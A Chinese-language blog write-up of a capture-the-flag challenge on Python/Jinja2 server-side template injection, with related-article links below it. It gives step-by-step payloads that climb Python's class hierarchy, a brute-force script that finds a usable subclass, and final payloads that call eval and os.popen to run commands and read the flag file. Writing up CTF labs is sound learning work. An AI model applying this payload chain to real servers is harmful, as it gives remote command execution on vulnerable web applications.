Web_python_template_injection[WriteUp]

最新推荐文章于 2024-04-01 22:10:58 发布
最新推荐文章于 2024-04-01 22:10:58 发布
阅读量385 收藏
点赞数
分类专栏: 攻防世界 文章标签: ssti
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/126099626
版权

这里是WriteUp,关于SSTI的详解请见一道[CSCCTF 2019 Qual]FlaskLight的详解再遇SSTI_sGanYu的博客-CSDN博客

访问靶场

靶场地址:攻防世界

http://61.147.171.105:60865/2

/{{2*2}}

{{}}作为变量包裹标识符,在渲染的时候会把{{}}包裹的内容当做变量解析替换,比如{{2*2}}会被解

析成4

/{{''.__class__}}

''的类型是str类型,调用__class__,指向变量所属的类,格式为"变量.__class__" 

/{{''.__class__.__mro__}}

由于''为str类型,通过str寻找当前类对象的所有继承类,当然__mro__不是唯一的方法,如__base__同样也可以寻找,但是只能找上一层的父类,如果被找的类型不止一个父类的话,就得通过很多个base去找  

/{{''.__class__.__mro__[2]}}

 __class__.__mro__以元组形式返还了两个关系,<class 'str'>和<class 'object'>,我们通过索引获取后面的object,也就是[2]

/{{''.__class__.__mro__[2].__subclasses__()}}

再通过__subclasses__找到object对象下的所有子类,当然同样可以通过__class__.__base__.__subclasses__()寻找 

脚本编写:

import requests

url = 'http://61.147.171.105:60865'
for i in range(1, 100):
    payload = "/{{''.__class__.__mro__[2].__subclasses__()["+str(i)+"].__init__['__glo'+'bals__']}}"
    newurl = url + payload
    res = requests.get(url=newurl + payload)
    if 'builtins' in res.text:
        print(newurl)
    else:
        pass

随便调用脚本生成的其中一个payload就行,这里我选择的是第一个

/{{''.__class__.__mro__[2].__subclasses__()[58].__init__['__glo'+'bals__']}}

/{{''.__class__.__mro__[2].__subclasses__()[58].__init__['__glo'+'bals__']['__builtins__']}}

/{{''.__class__.__mro__[2].__subclasses__()[58].__init__['__glo'+'bals__']['__builtins__']['eval']}}

/{{''.__class__.__mro__[2].__subclasses__()[58].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

远程命令执行,调用os模块 ,使用popen执行ls命令

/{{''.__class__.__mro__[2].__subclasses__()[58].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cat fl4g').read()")}}

bbb07
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
在“writeup_rsa_appprivatekey”中,作者可能详细记录了整个解密过程,包括所采用的策略、遇到的挑战以及最终的解决方案。这样的WriteUp对于学习者来说极其宝贵,因为它不仅展示了理论知识,还提供了实际问题解决的...
Web_python_template_injectionPython模块注入)
Welcome To Myon'Blog !
04-11 1366
Python的模块注入 flask/jinja2 常用于ssti的魔术方法 获取基类的几种方法 获取基本类的子类 采用os模块的listdir函数来读取目录 常用payload
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1141
好难啊
攻防世界-web-Web_python_template_injection
wuh2333的博客
06-16 2311
攻防世界,python模板注入
攻防世界web进阶区Web_python_template_injection详解
hxhxhxhxx的博客
07-28 1642
攻防世界web进阶区Web_python_template_injection详解题目详解python模板/框架Python中可以利用的方法和模块ssti常用注入,以及绕过姿势 题目 显而易见,根据题目的翻译 我们知道他是一个python的模板注入,ssti模板注入 详解 这里我们输入 http://220.249.52.133:55983/{{7+7}} 发现可以进行模板注入 这个题目和另外一个有点区别,tplmap并不能进行扫描 tplmap适用于有参数的一些模板注入 类对象并未发现 http:
ssti模板注入(入门级)Web_python_template_injection
qq_62046696的博客
05-29 706
Web_python_template_injection(攻防世界进阶) 打开界面判断一下是否是ssti注入? 输入{{7*7}}执行成功得到49,说明存在ssti模板注入 __class__ 返回类型所属的对象 __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。 __base__ 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的 __subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中
CTF_writeup
02-20
CTF_writeup
ADS Writeup_ads_
10-03
"Advanced Data Structure Writeup" 提供了一个深入探讨这一领域的详细分析,涵盖了各种复杂的数据结构及其在实际问题解决中的应用。 **一、数组** 数组是最基础的数据结构,它提供了固定大小且连续的内存空间来...
writeup_knkl_
09-30
【标题】"writeup_knkl_" 暗示了这是一个关于技术分析或漏洞报告的文档,其中"knkl"可能是某种缩写,可能代表一个特定的技术、工具或概念。由于描述部分"Raghav abnsaklfmleamafl;emgl;aeg"看起来像是随机字符序列,...
ADS Writeup_2_ads_
10-02
在“Advanced Data Structure Writeup_2_ads_”这个主题中,我们主要探讨的是高级数据结构的相关概念、应用和实现。数据结构是计算机科学中的一个重要领域,它研究如何组织和存储数据,以便更有效地进行访问和操作。...
web python template injection_攻防世界-Web_python_template_injection详解
weixin_39989668的博客
12-10 420
Web_python_template_injection在做这道题之前如果大家不懂可以先看一看这篇文章:从零学习flask模板注入基础知识:在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。1.判断有无模板注入payloadhttp://220.249.52.133:53362/{{7+7}}查看全局变量http://220.249.5...
【攻防世界】Web_python_template_injection
最新发布
2302_79800344的博客
04-01 915
【代码】【攻防世界】Web_python_template_injection
【愚公系列】2023年05月 攻防世界-WebWeb_python_template_injection
热门推荐
时光隧道
04-30 1万+
SSTI即(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理框架。
Web安全(Web_python_template_injection
m0_56010012的博客
03-01 1597
可以知道题目是template injection题目。 由此可知,说明存在“SSTI”。关于SSTI即服务端模板注入攻击,服务端接受用户输入,将其作为 Web 应用模板的一部分,渲染编译后执行了恶意内容,导致敏感信息泄露、代码执行等。 常规的魔术方法,如下。可以在博客CTF 中常见 Python 题型 SSTI - 网安有其他问题的介绍。 __class__ #返回type类型,查看对象的类型 __bases__ #返回tuple类型,列出该类的基类 __mro__ #返回tuple...
XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injectionSSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎)
Onlyone_1314的博客
11-26 1345
目录标题模板引擎SSTI服务器模板注入python模板注入Flask应用框架Jinja2模板渲染引擎Python中常用于ssti的魔术方法获取基类的一些方法获取基本类的子类四种方法读取flag(1)site._Printer类调用os.popen函数执行任意命令(2)site._Printer类调用os.listdir函数执行查看本级目录下的文件(3)catch_warnings类的linecache函数执行任意命令(4)遍历基类找函数执行__import __("os").popen("ls").read
攻防世界之Web_python_template_injectionweb进阶)
my_name_is_sy的博客
06-29 1973
考点为模板漏洞及其利用。
【网络安全 | CTF】一文带你了解SSTI漏洞 + Web_python_template_injection解题详析
等风来
05-28 5327
2.命令执行注入:攻击者在应用程序中的命令执行语句中注入模板代码,从而执行任意系统命令,获取系统权限,对系统进行攻击等。3.变量渲染注入:攻击者在应用程序中的变量渲染语句中注入模板代码,从而影响页面的输出,导致代码执行或信息泄漏等问题。在 Python 3 中,当对一个未导入的模块(如 os 模块)执行 eval() 函数时,linecache 模块会发出一个警告,可利用这个警告来读取敏感信息。1.条件语句注入:攻击者在应用程序中的条件语句中注入模板代码,从而控制条件判断的分支,导致程序的逻辑错误。
WEB:Web_python_template_injection
sleepywin的博客
07-29 234
可以看到当前目录下有个fl4g,执行cat fl4g。打开题目,发现页面提示,翻译为python模板注入。利用site.Printer的os模块执行命令。python模板注入。
攻防世界-Web_python_template_injection详解
Mr_helloword的博客
08-12 6891
Web_python_template_injection 在做这道题之前如果大家不懂可以先看一看这篇文章: 从零学习flask模板注入 基础知识: 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 1.判断有无模板注入 payload http://220.249.52.133:53362/{{7+7}} 查看全局变量 http://220.249.52.133:53362/{{config}} 基础知识: 文件包含:是通过python

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值